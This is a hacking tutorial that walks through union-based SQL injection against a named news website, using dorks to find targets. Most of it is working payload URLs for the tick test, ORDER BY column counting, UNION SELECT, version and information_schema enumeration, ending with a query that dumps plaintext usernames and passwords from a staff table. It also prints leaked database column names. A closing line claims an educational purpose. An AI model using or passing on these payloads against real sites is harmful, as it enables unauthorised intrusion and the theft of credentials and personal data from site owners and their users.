How To Hack Website By Sql Injection

Basic SQL Injection walkthrough with bizjournal.com as an example.(Not vulnerable Now)


You can find many vulnerable websites using  dorks.


Code:
http://www.bizjournal.com/content/article.php?id=124




The first thing you'll do is point your browser to that site then add a tick at the end of it.






Code:
http://www.bizjournal.com/content/article.php?id=124'




Success! You will get the valuable SQL Error that your looking for.




Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'\' ORDER BY id ASC LIMIT 0, 1' at line 1


Now it is time to discover how many columns the database has.
The easiest way to do this is by using the "Order By" statement in SQL
There are many other ways to do this but, this is the way I use.
So to do it first you will put in the url and add this to the end "order by 1--"




Code:
http://www.bizjournal.com/content/article.php?id=124 order by 1--


You'll notice that the site loads normally, because it has 1 column in its database.
The next thing will be to make it a negative interger so that you don't get all of the fuzz from the
site and make it cleaner to see what your doing.


http://www.bizjournal.com/content/article.php?id=-124 order by 1--


Notice it is a negative 124 now "-124"


Now its time to find out just how many columns it has. You do this by increasing the order by number:




Code:
http://www.bizjournal.com/content/article.php?id=-124 order by 1--
http://www.bizjournal.com/content/article.php?id=-124 order by 2--
http://www.bizjournal.com/content/article.php?id=-124 order by 3--
http://www.bizjournal.com/content/article.php?id=-124 order by 4--
http://www.bizjournal.com/content/article.php?id=-124 order by 5--
http://www.bizjournal.com/content/article.php?id=-124 order by 6--
http://www.bizjournal.com/content/article.php?id=-124 order by 7--
http://www.bizjournal.com/content/article.php?id=-124 order by 8--
http://www.bizjournal.com/content/article.php?id=-124 order by 9--
http://www.bizjournal.com/content/article.php?id=-124 order by 10--
http://www.bizjournal.com/content/article.php?id=-124 order by 11--


Success! it errors on "order by 11--" It does this because there aren't 11 columns in the database.
So now that we know we have only 10 columns we go into a new statement "UNION SELECT ALL".
This can be done a number of ways too but this is the way I do it.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,4,5,6,7,8,9,10--




What this does is searchs the database and returns which columns have data stored in them.
Notice that we have data stored in columns 2,3 and 4.
The next step will be to get the websites database version. We do this with a simple "@@version"
in place of one of the numbers where data is stored, I will use 4.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,@@version,5,6,7,8,9,10--


This will return the database version in the site where the number 4 was located.
Our version is:
5.0.67-log


Next step is to get the table names, now this is where alot of the tutorials fall short, the so the simple:
from information_schema.tables--
This will not generate just the user created tables this will show you a bunch of garbage such as CHARACTER_SETS, COALLATIONS, etc...
What we will do is just add on to this code with:
from information_schema.tables WHERE table_schema=database()--


To make this work on site we need to use the statemenet "group_concat" to display the tables:
group_concat(table_name)


For columns:
group_concat(column_name)


Example:




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(table_name),5,6,7,8,9,10 from information_schema.tables where table_schema=database()--




Ahh now we have the user created table names:


Code:
archives,articles,articles2,digest,edition,events,
links,nomination,sections,staf?f,survey


Now you need to look at the table names and decide which one would hold sensitive
data, to me
"staff" looks like a good choice.
So we will remember that for in a minute.


Next we will get the column names from the database with:
group_concat(column_name) from information_schema.columns where table_schema=database()--








Code:
id,date,title,by,abstract,body,section,keywords,photo,id,date,title
,author,abstr?act,body,section,
keywords,photo,caption,caption2,caption3,caption4,lead,id,date,title
,author,abstract,body?
,section,keywords,photo,caption,caption2,caption3,caption4,lead,i
d,date,title,city,body
,id,volume,number?,date,id,title,body,month,day,year,date,time,time2,
location,cost,contact,phone,
email,url,approved,id?,url,title,category,description,id,date,nominator,
nominatortitle,nominatorcompany
,nominatoraddress,n?ominatorcity,nominatorstate,nominatorzip,
nominatorphone,nominatorfax,
nominatoremail,nomineeco?mpany,nomineeaddress,nomineecity,
nomineestate,nomineezip,
nomineephone,nomineefax,nomineeweb,reason,re?asonother,sat1
,sat2,sat3,sat4,sat5,ethics1,
ethics2,ethics3,ethics4,contrib1,contrib2,contrib3,contrib4,de?v1
,dev2,dev3,dev4,dev5,dev6,
dev7,dev8,dev9,lead1,lead2,lead3,lead4,lead5,lead6,quality1,
quality2,contac?t1name,contact1title,
contact1phone,contact1email,contact2name,contact2title,contact2phone,
contact2ema?il,contact3name,
contact3title,c


Now you need to sift through these column names and find ones of interest to us. But what happens when you don't see a column like username or password?


Well sometime some of the columns will be cut off notice the "contact3title,c" at the end of the list.
Now its time to do a little guessing, this time its easier than most. username and password are both column names.


So to get check the columns we will use "group_concat" again but with our guessed column names and instead of:
from information_schema.tables where table_schema=database--
We will use:
from staff--
Remember I told you to remember the table name from earlier.


To give you an idea of what a wrong column name would look like it will look like this:
Note: 0x3a is the hex code for the colon ":"


Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10 from staff--


But we will try username and password this time.




Code:
http://www.bizjournal.com/content/article.php?id=-124 union select all 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10 from staff--




Bingo! We have a short list of usernames and they arent even hashed:


Note: I am not responsible for any misuse of this tutorial.this is just for educational purposes.